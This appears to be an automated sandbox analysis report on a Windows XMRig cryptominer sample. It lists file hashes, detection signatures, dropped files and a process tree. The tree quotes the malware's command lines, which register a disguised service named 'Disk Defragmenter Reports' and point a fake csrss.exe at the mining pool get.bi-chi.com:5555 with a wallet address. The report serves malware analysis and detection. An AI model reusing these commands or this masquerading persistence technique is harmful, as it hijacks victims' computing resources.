Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-12-2024 19:32

General

  • Target

    8dd1e17add364bc1620cae1b935df162a39ef5f6a5232932cf5b13247c5dd625.exe

  • Size

    916KB

  • MD5

    47ce7fdd09c103f348bf25353aff6d98

  • SHA1

    f71108f19aceb14258b7e1b772d3994b64a7a87b

  • SHA256

    8dd1e17add364bc1620cae1b935df162a39ef5f6a5232932cf5b13247c5dd625

  • SHA512

    18873a53f42b9bee5817b4ccf9bf3912c4f11b555d86b9b21e59bf489452ec47c8bcf46f827cbc559661a24b4d628dcb62bb02f0fb1de99f271c434775388d67

  • SSDEEP

    12288:SvfyIIIzAClE7uDOch+h2ul/mJoz3Wdtp3ldri8L7nuWVJKajDZ1/zdP1T:esSzlEqF+hVcOwt1RfzfjDZ9BdT

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 5 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8dd1e17add364bc1620cae1b935df162a39ef5f6a5232932cf5b13247c5dd625.exe
    "C:\Users\Admin\AppData\Local\Temp\8dd1e17add364bc1620cae1b935df162a39ef5f6a5232932cf5b13247c5dd625.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1716
    • C:\Users\Admin\AppData\Local\Temp\_ir_sf7_temp_0\irsetup.exe
      __IRAOFF:520716 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\8dd1e17add364bc1620cae1b935df162a39ef5f6a5232932cf5b13247c5dd625.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4840
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c C:\ProgramData\windows\run64.bat
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3764
        • C:\ProgramData\windows\svchost.exe
          C:\ProgramData\windows\svchost.exe install "Disk Defragmenter Reports" C:\ProgramData\windows\csrss.exe -o get.bi-chi.com:5555 -u 46U8UUW1ekBc8qEu2hVqgsJfkZq9QGVah2wrc1nx51ER2sXdsPQtimD3Gyg2yzcDY5WzuKT56dwtSaNnKtMGFuBZ4egVagc -p x -k
          4⤵
          • Executes dropped EXE
          PID:1644
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 3 127.0.0.1
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2816
        • C:\Windows\SysWOW64\sc.exe
          sc description "Disk Defragmenter Reports" "┤┼┼╠╦Θ╞¼╒√└φ▒¿╕µ╠ß╣⌐╓º│╓íú"
          4⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:4584
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 2 127.0.0.1
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3236
        • C:\ProgramData\windows\svchost.exe
          C:\ProgramData\windows\svchost.exe start "Disk Defragmenter Reports"
          4⤵
          • Executes dropped EXE
          PID:4928
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 3 127.0.0.1
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:1768
  • C:\ProgramData\windows\svchost.exe
    C:\ProgramData\windows\svchost.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:3172
    • C:\ProgramData\windows\csrss.exe
      "C:\ProgramData\windows\csrss.exe" -o get.bi-chi.com:5555 -u 46U8UUW1ekBc8qEu2hVqgsJfkZq9QGVah2wrc1nx51ER2sXdsPQtimD3Gyg2yzcDY5WzuKT56dwtSaNnKtMGFuBZ4egVagc -p x -k
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3112

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\windows\csrss.exe

    Filesize

    424KB

    MD5

    20e01f78a4ea17385722e9e051acd3f4

    SHA1

    d4f1c64dc03a0d7d65b8c9bae57eb8e474e6faf5

    SHA256

    f36892b46a9315431e45283a38d2a5fcdd21e2233631ffb2d1fc904cb11f76d3

    SHA512

    2dc288c449a1effe550240d05a969fa53b56141ef532ba1151aa44de188ea4ba96f66fb42814f162ebdf37fc55875c4f4a537ddb16ae7efa151322bb9b6b2473

  • C:\ProgramData\windows\run64.bat

    Filesize

    477B

    MD5

    1edbb85ab0d74309d369e14ffee9bd8f

    SHA1

    a3a2333677c6eab34bcacc780a9697b83e9f0a4d

    SHA256

    c5fc2888da7c8bde80cab3f3bb4f90a9e65e1dece2b7de1f377d9a5f31d83695

    SHA512

    f37fa509dd389439d38a7e32540086de9bf80d5b478979450764c0b2be08262da07b2febf1f6ef3b7183b769ad596f6c9e711275e7ef40fdcff3a73cb0987b5c

  • C:\ProgramData\windows\svchost.exe

    Filesize

    345KB

    MD5

    1e706b1e8d3bd3764e3ee4bf5fe509d8

    SHA1

    ba457bfcdc1b66609f142c3578be647c51d1356d

    SHA256

    29f0dbf2d07c4b68c3c9ee0d139d80bad3e9058fbf9dbd574cb5b047cf742e74

    SHA512

    f1b6eb345e3114e68a8b78cb711717b60b4604e6ff7578c2df3861187946b05b77259243e5b04c4b7e4a16dd6b1045a94f99cbeb46e5eac9e8c43c82d9e9d924

  • C:\Users\Admin\AppData\Local\Temp\_ir_sf7_temp_0\irsetup.exe

    Filesize

    440KB

    MD5

    75ca7ff96bf5a316c3af2de6a412bd54

    SHA1

    0a093950790ff0dddff6f5f29c6b02c10997e0c5

    SHA256

    d95b5bf9ca97c1900de5357743282bab655d61d616606485088e1708559b7cf1

    SHA512

    b8da86f2f1e908955254e5168d0447f479cec7815a8b081a7b38eb87187cb2eb992109c67e006361b96bc1529ee8abc9dc477d78e9ca565e43f5415b492771d4

  • memory/4840-4-0x0000000000400000-0x0000000000527000-memory.dmp

    Filesize

    1.2MB

  • memory/4840-33-0x0000000000400000-0x0000000000527000-memory.dmp

    Filesize

    1.2MB